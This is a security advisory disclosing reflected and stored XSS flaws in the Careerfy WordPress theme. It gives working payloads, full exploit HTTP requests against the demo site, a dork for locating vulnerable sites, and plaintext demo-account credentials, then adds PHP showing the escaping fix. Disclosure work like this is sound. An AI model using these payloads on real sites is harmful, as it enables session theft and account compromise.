Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities

2020.07.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 3.9.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79

### [ Info: ]

[i] An unauthenticated reflected XSS and multiple authenticated persistent XSS vulnerabilities were discovered in the Careerfy Job Board theme through 3.9.0 for WordPress.
[i] The authenticated persistent XSS @ Job Page triggers in the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.
[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)
[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)
[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/
[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/
[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc/

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]
[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Academic Level, Age, Salary, Gender, Industry, Full Address)
[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)
[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)

### [ Payloads: ]

[$] " autofocus onfocus=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; ">
[$] "><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
[$] "><img src=x onerror="alert(document.cookie);">

### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50

[!]
GET /petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50 HTTP/1.1
Host: careerfy.net

[!] https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time

[!]
GET /careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time HTTP/1.1
Host: careerfy.net

### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!]
POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806
Content-Length: 5335
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

01-07-2020
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_phone"

OK
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="dial_code"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="contry_iso_code"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_sector"

41
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

XSS
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_bio"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="academic-level"

masters-degree"><img src=x onerror=alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="Age"

18-22-years"><img src=x onerror=alert(document.domain);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="salary"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="gender"

hacker"><img src=x onerror=alert(`YAY!`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="industry"

web-security"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_facebook_url"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_twitter_url"

https://twitter.com/vlad_vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_linkedin_url"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_dribbble_url"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location3"

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lat"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lng"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------122256774439635172062989578806--

### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!]
POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262
Content-Length: 5853
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_phone"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="dial_code"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="contry_iso_code"

ru
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_website"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_sector"

33
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_bio"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="founded-since"

2018
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_facebook_url"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_twitter_url"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_linkedin_url"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_dribbble_url"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_address"

OK"><img src=x onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lat"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: image/jpeg

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

1337"><img src=x onerror=alert(document.domain);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_image[]"

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------207058957013654520581670329262--

### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!]
POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546
Content-Length: 4680
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update
Cookie: [cookies_here]

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="application_deadline"

July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);>
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_sector"

33
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_type"

21
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="get_job_skills[]"

Developer"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_type"

internal"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_url"

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_email"

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_max_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="offered-salary"

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="career-level"

officer"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="experience"

less-than-1-year"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="gender"

male"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="Industry"

development"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="qualifications"

certificate"><img src=x onerror=alert(document.domain); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLADVECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lat"

55.761035
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lng"

37.536004
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

9.719789233510344
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------5410881451781327061235735546--

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
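Both bug classes in the advisory share one root cause: the `location` query parameter is reflected into an input's value attribute unescaped, and select-backed profile and job fields (Academic Level, Gender, Industry, ...) accept arbitrary strings that are later echoed on the profile or job page. The PHP below is an added illustration of the fix pattern, not code from the Careerfy theme; it uses plain `htmlspecialchars()`, `strip_tags()` and a hypothetical option allowlist so it runs stand-alone, where a WordPress theme would reach for `esc_attr()`, `esc_html()` and `sanitize_text_field()`.

```php
<?php
// Added illustration (not Careerfy theme code): escape the reflected search
// parameter at output and validate select-backed profile fields on save.

// Allowed slugs for the select-backed fields the advisory lists as vulnerable
// (hypothetical option sets). A value like  masters-degree"><img src=x onerror=...>
// is rejected on save instead of being stored and echoed back.
const ALLOWED_OPTIONS = [
    'academic-level' => ['high-school', 'bachelors-degree', 'masters-degree'],
    'gender'         => ['male', 'female', 'other'],
    'industry'       => ['development', 'web-security', 'design'],
];

// Attribute context: the reflected PoC breaks out with  " autofocus onfocus=...
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
// A WordPress theme would call esc_attr() here.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_form(array $query): string {
    $location = (string) ($query['location'] ?? '');
    return '<input type="text" name="location" value="' . attr($location) . '">';
}

// Validate enumerated fields against the allowlist and strip markup from
// free-text fields before storage. Returns [$clean, $errors].
function sanitize_profile(array $post): array {
    $clean = [];
    $errors = [];
    foreach (ALLOWED_OPTIONS as $field => $allowed) {
        $value = (string) ($post[$field] ?? '');
        if ($value !== '' && !in_array($value, $allowed, true)) {
            $errors[] = "$field: value is not one of the allowed options";
            continue;
        }
        $clean[$field] = $value;
    }
    foreach (['jobsearch_field_location_address', 'user_bio'] as $field) {
        // Rough stand-in for sanitize_text_field(): strip tags, collapse whitespace.
        $raw = strip_tags((string) ($post[$field] ?? ''));
        $clean[$field] = trim(preg_replace('/\s+/', ' ', $raw));
    }
    return [$clean, $errors];
}

// Output context on the public profile: escape again; stored data is untrusted.
function render_profile_field(string $label, string $value): string {
    return '<li>' . attr($label) . ': ' . attr($value) . '</li>';
}

// Constructed inputs modelled on the advisory's payloads.
echo render_search_form(['location' => '" autofocus onfocus=alert(1) "']), PHP_EOL;
[$clean, $errors] = sanitize_profile([
    'academic-level'                   => 'masters-degree"><img src=x onerror=alert(1)>',
    'jobsearch_field_location_address' => '1337"><img src=x onerror=alert(1)>',
]);
print_r($errors);
echo render_profile_field('Full Address', $clean['jobsearch_field_location_address']), PHP_EOL;
```

Escaping at output is what stops the reflected case; the allowlist on save additionally keeps the stored fields from ever holding markup, so a later template that forgets to escape does not turn into the persistent case.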

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-01-careerfy-job-board-wordpress-theme-v3-9-0.txt
https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053


Copyright 2020, cxsecurity.com

 
